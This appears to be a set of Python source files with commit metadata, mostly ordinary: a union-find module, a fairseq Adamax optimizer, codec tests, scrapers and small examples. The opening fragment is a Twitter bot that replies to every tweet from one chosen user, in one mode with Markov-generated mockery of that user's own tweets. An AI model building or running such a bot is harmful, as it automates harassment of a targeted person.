self.followed_user_handle = followed_user_handle
self.mock_mode = mock_mode
self.reply_list = []
self.next_reply = ''
self.load_next_reply(mock_mode)
def on_error(self, error):
print("Returned error code %s" % error)
return False
def on_status(self, status):
if status.user.id == self.followed_user_id:
tweet_text = '@%s %s' % (self.followed_user_handle, self.next_reply)
self.api.update_status(tweet_text)
print(''%s: Tweeted:'' % (ctime(), tweet_text))
if self.mock_mode:
self.update_mock_text(status.text)
self.load_next_reply(self.mock_mode)
def load_next_reply(self, mock=False):
if not mock:
with open('reply_list.txt', 'r') as reply_list_file:
self.reply_list = reply_list_file.readlines()
self.next_reply = random.choice(self.reply_list)
else:
with open('user_tweet_history.txt') as user_tweet_history_file:
text = user_tweet_history_file.read()
text_model = markovify.Text(text)
self.next_reply = text_model.make_short_sentence(140)
@staticmethod
def update_mock_text(text):
with open('user_tweet_history.txt', 'wa') as user_tweet_history_fd:
user_tweet_history_fd.write(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--handle',
required=True,
type=str,
dest='followed_handle',
action='store',
help='Twitter handle (without @)')
parser.add_argument('--mock',
dest='mock_mode',
default=False,
action='store_true',
help='enable mock mode')
args = parser.parse_args()
auth = OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = API(auth)
found_users = api.lookup_users(screen_names=[str(args.followed_handle)])
print found_users
if len(found_users) != 1:
print('Lookup for twitter handle %s failed' % args.followed_handle)
sys.exit()
followed_user_id = found_users[0].id
print followed_user_id
twitterStream = Stream(auth, Listener(api, followed_user_id, args.followed_handle, args.mock_mode))
twitterStream.filter(follow=[str(followed_user_id)], async=True)
| Python | 0.999991 |
c99bee3628e55873e5bb9b6e98fd0455b6b45c64 | add examples for recipe 1.14 | code/ch_1-DATA_STRUCTURES_AND_ALGORITHMS/14-sorting_objects_without_native_comparison_support/main.py | code/ch_1-DATA_STRUCTURES_AND_ALGORITHMS/14-sorting_objects_without_native_comparison_support/main.py | def example_1():
class User:
def __init__(self, user_id):
self.user_id = user_id
def __repr__(self):
return 'User({})'.format(self.user_id)
users = [User(23), User(3), User(99)]
print(users)
print(sorted(users, key = lambda u: u.user_id))
from operator import attrgetter
print(sorted(users, key = attrgetter('user_id')))
print(min(users, key = attrgetter('user_id')))
print(max(users, key = attrgetter('user_id')))
if __name__ == '__main__':
example_1()
| Python | 0 | |
836d4ed6a3ddda4d381345a34358714db74af757 | Add an helper push program | share/examples/push.py | share/examples/push.py | import sys
import zmq
from zmq.utils.strtypes import b
def main():
# Get the arguments
if len(sys.argv) != 4:
print("Usage: push.py url topic num_messages")
sys.exit(1)
url = sys.argv[1]
topic = sys.argv[2]
num_messages = int(sys.argv[3])
# Create the socket
context = zmq.Context()
sock = context.socket(zmq.PUSH)
sock.connect(url)
for i in range(0, num_messages):
sock.send_multipart([b(topic), b("id"), b(str(i))])
if __name__ == "__main__":
main()
| Python | 0.000001 | |
cc7ecc419f75fa672ff215e7c6157bac8ebfb29e | Add union-find implementation | unionfind.py | unionfind.py | """
A simple Union-Find data structure implementation.
author:
Christos Nitsas
(chrisn654 or nitsas)
language:
Python 3(.4)
date:
July, 2014
"""
class UnionFindSimpleImpl:
"""
A simple Union-Find data structure implementation.
If n is the number of items in the structure, a series of m union
operations will take O(m * log(n)) time. Find operations are (amortized)
constant time (O(1)) though.
"""
def __init__(self, items):
"""Initialize the Union-Find structure from an iterable."""
self._items = set(items)
self._leader = dict()
self._followers = dict()
self._cluster_size = dict()
for item in self._items:
self._leader[item] = item
self._followers[item] = [item]
self._cluster_size[item] = 1
def __getitem__(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.find().
"""
return self._leader[item]
def find(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.__getitem__().
"""
return self[item]
def union(self, leader_A, leader_B):
"""
Joins together the two clusters that items leader_A
and leader_B represent.
"""
if leader_A == leader_B:
return
if self._cluster_size[leader_B] > self._cluster_size[leader_A]:
leader_A, leader_B = leader_B, leader_A
for follower in self._followers[leader_B]:
self._leader[follower] = leader_A
self._followers[leader_A].extend(self._followers[leader_B])
del(self._followers[leader_B])
self._cluster_size[leader_A] += self._cluster_size[leader_B]
del(self._cluster_size[leader_B])
def num_clusters(self):
"""Returns the current number of clusters."""
return len(self._cluster_size)
def items(self):
"""Returns a set containing all the items in the structure."""
return self._items
class UnionFindUnionByRankAndPathCompression:
"""
A faster Union-Find implementation with lazy unions (using union by
rank) and path compression.
A series of m union & find operations on a structure with n items
will need time O(m * a(n)), where a(n) is the reverse Ackerman
function.
"""
def __init__(self, items):
"""Initialize the Union-Find structure from an iterable."""
raise(NotImplementedError)
def __getitem__(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.find().
"""
raise(NotImplementedError)
def find(self, item):
"""
Returns the cluster (i.e. the cluster's leader) that the
given item belongs to.
Equivalent to UnionFindStructure.__getitem__().
"""
raise(NotImplementedError)
def union(self, leader_A, leader_B):
"""
Joins together the two clusters that items leader_A
and leader_B represent.
"""
raise(NotImplementedError)
def num_clusters(self):
"""Returns the current number of clusters."""
raise(NotImplementedError)
def items(self):
"""Returns a set containing all the items in the structure."""
raise(NotImplementedError)
_default_impl = UnionFindSimpleImpl
class UnionFindStructure:
"""
A Union-Find data structure interface.
It relies on a concrete Union-Find implementation such as
UnionFindSimpleImpl or UnionFindLazyUnionsAndPathCompressionImpl.
"""
def __init__(self, items, *, impl=_default_impl):
self._impl = impl(items)
def __getitem__(self, item):
return self._impl.__getitem__(item)
def __getattr__(self, name):
return getattr(self._impl, name)
| Python | 0 | |
c446c44b1f2023808d48609dbeb48c58fdba1cf3 | Add Adamax optimizer | fairseq/optim/adamax.py | fairseq/optim/adamax.py | # Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
import torch
import torch.optim
from . import FairseqOptimizer, register_optimizer
@register_optimizer('adamax')
class FairseqAdamax(FairseqOptimizer):
def __init__(self, args, params):
super().__init__(args, params)
self._optimizer = Adamax(params, **self.optimizer_config)
@staticmethod
def add_args(parser):
"""Add optimizer-specific arguments to the parser."""
# fmt: off
parser.add_argument('--adamax-betas', default='(0.9, 0.999)', metavar='B',
help='betas for Adam optimizer')
parser.add_argument('--adamax-eps', type=float, default=1e-8, metavar='D',
help='epsilon for Adam optimizer')
parser.add_argument('--weight-decay', '--wd', default=0.0, type=float, metavar='WD',
help='weight decay')
parser.add_argument('--no-bias-correction', default=False, action='store_true',
help='disable bias correction')
# fmt: on
@property
def optimizer_config(self):
"""
Return a kwarg dictionary that will be used to override optimizer
args stored in checkpoints. This allows us to load a checkpoint and
resume training using a different set of optimizer args, e.g., with a
different learning rate.
"""
return {
'lr': self.args.lr[0],
'betas': eval(self.args.adamax_betas),
'eps': self.args.adamax_eps,
'weight_decay': self.args.weight_decay,
'bias_correction': not self.args.no_bias_correction,
}
class Adamax(torch.optim.Optimizer):
"""Implements Adamax algorithm (a variant of Adam based on infinity norm).
It has been proposed in `Adam: A Method for Stochastic Optimization`__.
Compared to the version in PyTorch, this version implements a fix for weight decay.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
bias_correction (bool, optional): enable bias correction (default: True)
__ https://arxiv.org/abs/1412.6980
"""
def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, bias_correction=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
bias_correction=bias_correction)
super(Adamax, self).__init__(params, defaults)
@property
def supports_memory_efficient_fp16(self):
return True
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('Adamax does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_inf'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_inf'] = state['exp_inf'].type_as(p_data_fp32)
exp_avg, exp_inf = state['exp_avg'], state['exp_inf']
beta1, beta2 = group['betas']
eps = group['eps']
state['step'] += 1
# Update biased first moment estimate.
exp_avg.mul_(beta1).add_(1 - beta1, grad)
# Update the exponentially weighted infinity norm.
torch.max(
exp_inf.mul_(beta2),
grad.abs_(),
out=exp_inf,
)
step_size = group['lr']
if group['bias_correction']:
bias_correction = 1 - beta1 ** state['step']
step_size /= bias_correction
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
p_data_fp32.addcdiv_(-step_size, exp_avg, exp_inf.add(eps))
p.data.copy_(p_data_fp32)
return loss
| Python | 0 | |
a4924a6928facdda942844b1bac8f0a53eb9ff4b | add 1 OPP file: slots | use_slots.py | use_slots.py | #!/user/bin/env python3
# -*- coding: utf-8 -*-
class Student(object):
_slots_ = ('name', 'age')
class GraduateStudent(Student):
pass
s = Student()
s.name = 'Michael'
s.age = 15
try:
s.score = 88
except AttributeError as e:
print('AttributeError:', e)
g = GraduateStudent()
g.score = 99
print(g.score)
| Python | 0 | |
b6b2f268693764deb70553b00904af4aa6def15f | add lamp_genie.py - aladin 오프라인 매장을 검색해서 키워드의 책 ISBN번호를 알려준다. | lamp_genie.py | lamp_genie.py | #-*- coding: utf-8 -*-
import requests
import BeautifulSoup
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
mobile_site_url = "http://www.aladin.co.kr"
search_url = "http://off.aladin.co.kr/usedstore/wsearchresult.aspx?SearchWord=%s&x=0&y=0"
book_url = "http://off.aladin.co.kr/usedstore/wproduct.aspx?ISBN=%d"
response = requests.get(mobile_site_url + '/m/off/gate.aspx?')
content = response.content
search_text = requests.utils.quote(raw_input("검색할 책 제목이나 글쓴이 : ").encode('cp949'))
shop_list = BeautifulSoup.BeautifulSoup(content).findAll('td')
s = requests.Session()
for x in shop_list:
print "=" * 50
try:
shop_location = x.text
url = x.find('a')
response = s.get(mobile_site_url + url['href'])
url = search_url % search_text
print url
response = s.get(url)
content = response.content
result = BeautifulSoup.BeautifulSoup(content).find('div', {'id':'Search3_Result'})
try:
result_list = set()
for x in result.findAll('a'):
search_code = str(x).split('ISBN=')
if search_code.__len__() > 1:
isbn = search_code[1].split('"')[0]
result_list.add(isbn)
print shop_location, result_list
except:
print set()
except Exception as e:
pass
| Python | 0 | |
13c14b8c2b44d2f9b39e46d395fcde891ba6ba9f | Patch #670715: Universal Unicode Codec for POSIX iconv. | Lib/test/test_iconv_codecs.py | Lib/test/test_iconv_codecs.py | from test import test_support
import unittest, sys
import codecs, _iconv_codec
from encodings import iconv_codec
from StringIO import StringIO
class IconvCodecTest(unittest.TestCase):
if sys.byteorder == 'big':
spam = '\x00s\x00p\x00a\x00m\x00s\x00p\x00a\x00m'
else:
spam = 's\x00p\x00a\x00m\x00s\x00p\x00a\x00m\x00'
def test_sane(self):
self.encoder, self.decoder, self.reader, self.writer = \
codecs.lookup(_iconv_codec.internal_encoding)
self.assertEqual(self.decoder(self.spam), (u'spamspam', 16))
self.assertEqual(self.encoder(u'spamspam'), (self.spam, 8))
self.assertEqual(self.reader(StringIO(self.spam)).read(), u'spamspam')
f = StringIO()
self.writer(f).write(u'spamspam')
self.assertEqual(f.getvalue(), self.spam)
def test_basic_errors(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
def testencerror(errors):
return self.encoder(u'sp\ufffdam', errors)
def testdecerror(errors):
return self.decoder('sp\xffam', errors)
self.assertRaises(UnicodeEncodeError, testencerror, 'strict')
self.assertRaises(UnicodeDecodeError, testdecerror, 'strict')
self.assertEqual(testencerror('replace'), ('sp?am', 5))
self.assertEqual(testdecerror('replace'), (u'sp\ufffdam', 5))
self.assertEqual(testencerror('ignore'), ('spam', 5))
self.assertEqual(testdecerror('ignore'), (u'spam', 5))
def test_pep293_errors(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
def testencerror(errors):
return self.encoder(u'sp\ufffdam', errors)
def testdecerror(errors):
return self.decoder('sp\xffam', errors)
self.assertEqual(testencerror('xmlcharrefreplace'),
('sp�am', 5))
self.assertEqual(testencerror('backslashreplace'),
('sp\\ufffdam', 5))
def error_bomb(exc):
return (u'*'*40, len(exc.object))
def error_mock(exc):
error_mock.lastexc = exc
return (unicode(exc.object[exc.start - 1]), exc.end)
codecs.register_error('test_iconv_codec.bomb', error_bomb)
codecs.register_error('test_iconv_codec.mock', error_mock)
self.assertEqual(testencerror('test_iconv_codec.bomb'),
('sp' + ('*'*40), 5))
self.assertEqual(testdecerror('test_iconv_codec.bomb'),
(u'sp' + (u'*'*40), 5))
self.assertEqual(testencerror('test_iconv_codec.mock'), ('sppam', 5))
exc = error_mock.lastexc
self.assertEqual(exc.object, u'sp\ufffdam')
self.assertEqual(exc.start, 2)
self.assertEqual(exc.end, 3)
self.assert_(isinstance(exc, UnicodeEncodeError))
self.assertEqual(testdecerror('test_iconv_codec.mock'), (u'sppam', 5))
exc = error_mock.lastexc
self.assertEqual(exc.object, 'sp\xffam')
self.assertEqual(exc.start, 2)
self.assertEqual(exc.end, 3)
self.assert_(isinstance(exc, UnicodeDecodeError))
def test_empty_escape_decode(self):
self.encoder, self.decoder, self.reader, self.writer = \
iconv_codec.lookup("ascii")
self.assertEquals(self.decoder(u""), ("", 0))
self.assertEquals(self.encoder(""), (u"", 0))
def test_main():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(IconvCodecTest))
test_support.run_suite(suite)
if __name__ == "__main__":
test_main()
# ex: ts=8 sts=4 et
| Python | 0 | |
a3afcb81b2aec2043576aa87cdeba266b4576b2c | Add processor | indra/sources/phosphoELM/processor.py | indra/sources/phosphoELM/processor.py | import requests
import logging
from indra.statements import Phosphorylation, Evidence, Agent
from indra.preassembler.grounding_mapper import GroundingMapper
gilda_url = 'http://grounding.indra.bio/ground'
logger = logging.getLogger(__file__)
def _gilda_grounder(entity_str):
# If match found, return the string that provided the match
res = requests.post(gilda_url, json={'text': entity_str})
if res.status_code == 200 and res.json():
db_ns = res.json()[0]['term']['db']
db_id = res.json()[0]['term']['id']
return entity_str, db_ns, db_id
else:
if res.status_code != 200:
logger.warning('Gilda service responded with status code %d' %
res.status_code)
return entity_str, None, None
class PhosphoELMPRocessor(object):
def __init__(self, file_dump_json=None):
self.statements = []
self.statements.extend(self._from_file_dump_json(file_dump_json))
def _from_file_dump_json(self, fd_json, keep_empty=False,
non_human=False):
"""Structuring the json entry to Phosphorylation statements
fd_json : list(json)
JSON comatible list of entries
keep_empty : bool
If true, also create statements when upstream kinases
(in entry['kinases']) are not known.
non_human : bool|str|list(str)
If true, use all entries regardless of species. If a string or
list of strings, also use the species provided in the list.
Homo sapiens is always used.
Returns
-------
"""
if fd_json is None:
return []
statements = []
for entry in fd_json:
if not keep_empty and not entry['kinases'] or not non_human \
and not entry['species'].lower() == 'homo sapiens':
# Skip entries without any kinases or if species is other
# than human when 'use_non_human' is False.
continue
# Entries:
# 'acc': '<UP ID>', <-- substrate
# 'sequence': '<protein sequence>',
# 'position': '<position>',
# 'code': '<phosphorylated residue>',
# 'pmids': '<pmid>',
# 'kinases': '<responsible kinase>', <-- enzyme
# 'source': 'HTP|LTP',
# 'species': '<species name in latin>',
# 'entry_date': 'yyyy-mm-dd HH:MM:SS.mmmmmm'
substrate = Agent(None, db_refs={'UP': entry['acc']})
used_name, enz = self._get_enzyme(entry['kinases'])
GroundingMapper.standardize_agent_name(substrate)
GroundingMapper.standardize_agent_name(enz)
evidence = Evidence(annotations={
'data_source': 'High-ThroughPut' if
entry['source'].lower == 'htp' else 'Low-ThroughPut',
'phosphoelm_substrate': entry['acc'],
'phosphoelm_kinase': entry.get('kinases', 'unknown')
})
statements.append(Phosphorylation(
enz=enz,
sub=substrate,
residue=entry['code'],
position=entry['position'],
evidence=evidence)
)
return statements
@staticmethod
def _get_enzyme(upstream_kinase):
"""Handle the upstream kinases
Parameters
----------
upstream_kinase : str
The string occuring in the entry 'upstream_kinases'
Returns
-------
kinases : indra.statements.Agent
The agents contained in 'upstream_kinases'
"""
strip_words = ['_group', 'kinase', '_drome', '_Caeel']
# Pre process: strip 'strip words' and any trailing space
for word in strip_words:
upstream_kinase = upstream_kinase.replace(word, '').rstrip()
used_str, ns, id = _gilda_grounder(upstream_kinase)
# Split on '_'
if ns is None and id is None and '_' in used_str:
used_str, suffix = used_str.split('_')
used_str, ns, id = _gilda_grounder(used_str)
# Split on '/'
if ns is None and id is None and '/' in used_str:
used_str = used_str.split('/')[0]
used_str, ns, id = _gilda_grounder(used_str)
if ns is None and id is None:
ns = 'TEXT'
id = used_str
ag = Agent(None, db_refs={ns: id})
return used_str, ag
# def _seq_mapping(self, sequence, position, residue, species):
# pass
| Python | 0.000019 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.